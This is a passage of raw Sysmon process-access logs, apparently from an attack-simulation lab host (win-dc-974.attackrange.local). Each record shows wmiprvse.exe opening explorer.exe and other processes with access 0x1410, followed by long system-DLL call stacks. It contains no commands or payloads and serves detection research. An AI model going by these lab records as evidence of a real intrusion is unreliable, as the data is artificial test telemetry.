indows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239526Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.266{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239525Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.265{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239524Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.265{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239523Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.264{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239522Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.263{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239521Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239520Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239519Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239518Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239517Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239516Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239515Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239514Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239513Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239512Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239511Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239510Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239509Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239508Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239507Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 